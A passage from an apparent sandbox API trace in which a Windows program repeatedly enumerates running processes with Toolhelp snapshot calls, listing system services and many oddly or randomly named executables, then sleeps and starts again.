szExeFile="svchost.exe")) returned 1 [0111.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.621] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.624] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.631] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.632] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.634] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.637] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.638] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.642] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.668] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.677] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.679] CloseHandle (hObject=0xc4) returned 1 [0111.679] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0111.685] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.700] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.702] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.734] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.737] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.739] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0111.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0111.742] CloseHandle (hObject=0xbc) returned 1 [0111.742] Sleep (dwMilliseconds=0x12c) [0112.123] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.128] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 